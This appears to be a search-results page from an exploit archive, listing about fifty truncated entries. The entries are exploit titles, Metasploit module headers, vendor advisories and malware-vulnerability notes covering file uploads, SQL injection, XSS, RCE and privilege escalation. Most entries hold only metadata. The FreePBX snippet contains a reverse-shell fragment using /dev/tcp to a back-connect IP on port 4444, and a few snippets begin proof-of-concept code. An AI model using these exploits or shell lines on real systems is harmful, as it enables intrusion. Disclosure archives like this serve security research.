50748 matches found
Simple Music Management System 1.0 Arbitrary File Upload
============================================================================================================================================= | Title : Simple Music Management System v1.0 Remote File Upload Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla...
Beauty Parlour And Saloon Management System 1.1 Insecure Settings
==================================================================================================================================== | Title : Beauty Parlour & Saloon Management System 1.1 Insecure Settings Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla...
Online Travel Agency System 1.0 Shell Upload
============================================================================================================================================= | Title : Travel v1.0 Remote File Upload Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla firefox 125.0.1 64 bits ...
FreePBX 16 Remote Code Execution
Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...
WhatsUp Gold 2022 22.1.0 Build 39 Cross Site Scripting
Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting XSS Date: April 18, 2023 Exploit Author: Andreas Finstad 4ndr34z Vendor Homepage: https://www.whatsupgold.com Version: v.22.1.0 Build 39 Tested on: Windows 2022 Server CVE : CVE-2023-35759 Reference:...
PHPJabbers Meeting Room Booking System 1.0 Missing Rate Limiting
Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - No Rate Limit Date: 19/12/2023 Exploit Author: BugsBD Limited Discover by: Rahad Chowdhury Vendor Homepage: https://www.phpjabbers.com/ Software Link: https://www.phpjabbers.com/meeting-room-booking-system/sectionDemo Version: v1.0 Test...
Microsoft Defender Anti-Malware PowerShell API Arbitrary Code Execution
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFTDEFENDERANTIMALWAREPOWERSHELLAPIUNINTENDEDCODEEXECUTION.txt + twitter.com/hyp3rlinx + x.com/hyp3rlinx + ISR: ApparitionSec Vendor www.microsoft.com Product Windows...
Penglead 2.0 SQL Injection
Title: penglead-2.0 SQLi-Bypass Authentication Author: nu11secur1ty Date: 11/10/2023 Vendor: https://www.mayurik.com/ Software: https://www.mayurik.com/source-code/P2760/lead-management-system-in-php-free-download Reference: https://portswigger.net/web-security/sql-injection Description: The id...
Apache NiFi H2 Connection String Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache NiFi H2 Connection String Remote Code Execution', 'Description' = %q The DBCPConnectionPool and HikariCPConnectionPool Controller Services...
Canon PIXMA TR4550 1.020 / 1.080 Unencrypted Secret Storage
Advisory ID: SYSS-2023-011 Product: PIXMA TR4550 Manufacturer: Canon Affected Versions: 1.020 / 1.080 also affects many other Canon inkjet printer models4 Tested Versions: 1.020 / 1.080 Vulnerability Type: Insufficient or Incomplete Data Removal within Hardware Component CWE-1301 Insufficiently...
PHPJabbers Forum Script 3.0 Cross Site Scripting
┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An...
GeoVision Camera GV-ADR2701 Authentication Bypass
Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass Device name: GV-ADR2701 Date: 26 December , 2020 Exploit Author: Chan Nyein Wai Vendor Homepage: https://www.geovision.com.tw/ Software Link: https://www.geovision.com.tw/download/product/ Firmware Version: V1.0020171215 Tested on...
GLPI Cartography Shell Upload
Exploit Title: GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution RCE Date of found: 11 Jun 2022 Application: GLPI Cartography...
Linear eMerge E3-Series Access Controller Command Injection
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/stopwatch' class MetasploitModule 'Linear eMerge E3-Series Access Controller Command Injection', 'Description' = %q This module exploits a command injection...
Intel Data Center Manager 5.1 Local Privilege Escalation
RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Intel Data Center Manager Vendor URL: https://www.intel.com/content/www/us/en/developer/tools/data-center-manager-console/overview.html Type: Incorrect Use of Privileged APIs CWE-648 Date...
WiFi Mouse 1.8.3.4 Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Wifi Mouse RCE', 'Description' = %q The WiFi Mouse Mouse Server from Necta LLC contains an auth bypass as the authentication is completely...
WordPress WP-UserOnline 2.88.0 Cross Site Scripting
Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting XSS Google Dork: inurl:/wp-content/plugins/wp-useronline/ Date: 2022-08-24 Exploit Author: UnD3sc0n0c1d0 Vendor Homepage: https://github.com/lesterchan/wp-useronline Software Link:...
Bitbucket Git Command Injection
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Bitbucket Git Command Injection', 'Description' = %q Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated...
Backdoor.Win32.HoneyPot.a MVID-2022-0622 Weak Hardcoded Password
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/e3bb503f9b02cf57341695f30e31128f.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.HoneyPot.a Vulnerability: Weak Hardcoded Password Description: The malware...
WordPress WP Downgrade Cross Site Scripting
Tittle: WordPress Plugin WP Downgrade alert/XSS/ Classification Type XSS OWASP top 10 A7: Cross-Site Scripting XSS CWE-79 wpScan: https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba TracWordpress: https://plugins.trac.wordpress.org/changeset/2696091...
Online Examination System Project 1.0 SQL Injection
Title: Online Examination System Project 1.0 SQL - Injections Author: nu11secur1ty Date: 01.10.2022 Vendor: https://projectworlds.in/free-projects/php-projects/ Software: https://projectworlds.in/free-projects/php-projects/online-examination/ Description: The eid parameter in account.php from...
Netfilter x_tables Heap Out-Of-Bounds Write / Privilege Escalation
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Netfilter xtables Heap OOB Write Privilege Escalation', 'Description' = %q A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was...
Trojan.Win32.Pincav.cmfl Insecure Permissions
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/9d296ebd6b4f79457fcc61e38dcce61e.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.Win32.Pincav.cmfl Vulnerability: Insecure Permissions Description: The trojan creates an...
aptdaemon File Existence Disclosure
Exploit Title: File Existence Disclosure in aptdaemon " sys.exit0 FILETOCHECK = sys.argv1 bus = dbus.SystemBus aptdbusobject = bus.getobject"org.debian.apt", "/org/debian/apt" aptdbusi...
Cisco ASA Crash Proof Of Concept
Cisco ASA CVE-2018-0101 Crash PoC We basically just read: https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf @zerosum0x0, @jennamagius, @alephnaught import requests, sys headers = headers'User-Agent' = 'Open AnyConnect VPN Agent...
Litespeed Cache 6.5.0.1 Authentication Bypass
Litespeed Cache version 6.5.0.1 suffers from an authentication bypass vulnerability. Exploit Title: Litespeed unauthorized account takeover Google Dork: if applicable Date: reported on 17 September 2024 Exploit Author: Gnzls Vendor Homepage: https://www.litespeedtech.com/ Software Link:...
Intel AMT Digest Authentication Bypass Scanner
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Intel AMT Digest Authentication Bypass Scanner', 'Description' = %q This module scans for Intel Active Management Technology endpoints and attemp...
Postfixadmin Protected Alias Deletion
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Postfixadmin Protected Alias Deletion Vulnerability', 'Description' = %q Postfixadmin installations between 2.91 and 3.0.1 do not check if an adm...
Online Discussion Forum Site 1.0 Insecure Settings
==================================================================================================================================== | Title : Online Discussion Forum Site v1.0 Insecure Settings Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla firefox...
AEGON LIFE 1.0 SQL Injection
Exploit Title: Life Insurance Management System- SQL injection vulnerability. Exploit Author: Aslam Anwar Mahimkar Date: 18-05-2024 Category: Web application Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ Version: AEGON...
Firefox 121 / Chrome 120 Denial Of Service
Minor firefox DoS - semi silently polluting /Downloads with files part 2 Tested on: firefox 121 and chrome 120 on GNU/linux Date: Thu Jan 18 08:38:28 AM UTC 2024 This is barely a DoS, but since it might affect Chrome too we decided to disclose it. If firefox user visits a specially crafted page,...
SpyCamLizard 1.230 Denial Of Service
!/usr/bin/perl use IO::Socket::INET; Exploit Title: SpyCamLizard 1.230 - Denial of Service DoS Discovery by: Fernando Mengali Discovery Date: 18 january 2024 Vendor Homepage: http://www.spycamlizard.com Download to demo:...
Easy Member Pro 3.0 Insecure Direct Object Reference
==================================================================================================================================== | Title : Easy Member pro v3.0 Unauthorised Administrative Access Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser : Mozilla...
Webutler 3.2 Shell Upload
Exploit Title: Webutler v3.2 - Remote Code Execution RCE Application: webutler Cms Version: v3.2 Bugs: RCE Technology: PHP Vendor URL: https://webutler.de/en Software Link: http://webutler.de/download/webutlerv3.2.zip Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technic...
Western Digital MyCloud Unauthenticated Command Injection
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Western Digital MyCloud unauthenticated command injection', 'Description' = %q This module exploits authentication bypass CVE-2018-17153 and...
Wifi Soft Unibox Administration 3.0 / 3.1 SQL Injection
Exploit Title: Wifi Soft Unibox Administration 3.0 & 3.1 Login Page - Sql Injection Google Dork: intext:"Unibox Administration 3.1", intext:"Unibox 3.0" Date: 07/2023 Exploit Author: Ansh Jain @sudoark Author Contact : [email protected] Vendor Homepage: https://www.wifi-soft.com/ Software Link:...
Backdrop CMS 1.25.1 Cross Site Scripting
Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting XSS Application: Backdrop Cms Version: v1.25.1 Bugs: Stored Xss Technology: PHP Vendor URL: https://backdropcms.org/ Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip Date of found: 12-07-202...
Architect HTML And Site Builder 2.2.3 File Upload
==================================================================================================================================== | Title : Architect - HTML and Site Builder V 2.2.3 Remote File Upload vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser :...
Rukovoditel 3.3.1 CSV Injection
Exploit Title: Rukovoditel 3.3.1 - CSV injection Version: 3.3.1 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 27-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC...
Korenix JetWave Command Injection / Denial Of Service
CyberDanube Security Research 20230213-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S, | JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L, | JetWave 2414/2114,...
Trojan.Win32.Agent.hsm Insecure Permissions
Discovery / credits: Malvuln - malvuln.com c 2021 Original source: https://malvuln.com/advisory/c58d5aecd223ac95ae5fab6dcd69e953.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.Win32.Agent.hsm Vulnerability: Insecure Permissions Description: Agent.hsm creates an insecur...
Sudo 1.9.5p1 Buffer Overflow / Privilege Escalation
Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation 1 Date: 2021-02-02 Exploit Author: West Shepherd Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1. Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31 CVE :...
Backdoor.Win32.Ketch.i Remote Stack Buffer Overflow
Discovery / credits: malvuln - Malvuln.com c 2021 Original source: https://malvuln.com/advisory/ee314e1b913a09ec86c63d7186d8f0b8.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Backdoor.Win32.Ketch.i Vulnerability: SEH Remote Stack Buffer Overflow Description: Ketch makes HTTP...
SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure
SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure Vendor: SpinetiX AG Product web page: https://www.spinetix.com Affected version: = 3.4.8 1.0.36274 Summary: At SpinetiX we inspire businesses to unlock the potential of their story. We believe in the power of digital signage as a...
Protection Licensing Toolkit ReadyAPI 3.2.5 Code Execution / Deserialization
Advisory ID: SYSS-2019-039 Product: Protection Licensing Toolkit, SoapUI/LoadUI/ServiceV Pro Manufacturer: jProductivity LLC, SmartBear Software Affected Versions: - ReadyAPI 3.2.5 Tested Versions: ReadyAPI 3.2.5 Vulnerability Type: Unsafe deserialization/remote code execution CWE-502 Risk Level:...
eWON Flexy 13.0 Authentication Bypass
! /usr/bin/env python ''' Exploit Title: eWON v13.0 Authentication Bypass Date: 2018-10-12 Exploit Author: Photubias – tijldotDeneutatHowestdotbe for www.ic4.be Vendor Advisory: 1 https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0 2...
ABB Cylon FLXeon 9.3.4 cert.js System Logs Information Disclosure
ABB Cylon FLXeon version 9.3.4 has an issue where an authenticated attacker can access sensitive information via the system logs page of ABB Cylon FLXeon controllers. The logs expose critical data, including the OpenSSL password for stored certificates. This information can be leveraged for furth...
fronsetia 1.1 Cross Site Scripting
Exploit Title: Reflected XSS - fronsetiav1.1 Date: 11/2024 Exploit Author: Andrey Stoykov Version: 1.1 Tested on: Debian 12 Blog: https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.html Reflected XSS 1 - "showoperations.jsp" Steps to Reproduce: 1. Visit main page of th...
Spring Cloud Config Server Directory Traversal
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Directory Traversal in Spring Cloud Config Server', 'Description' = %q This module exploits an unauthenticated directory traversal vulnerability...
Alphaware E-Commerce System 1.0 Code Injection
============================================================================================================================================= | Title : Alphaware E-CommerceSystem 1.0 php code injection Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla firef...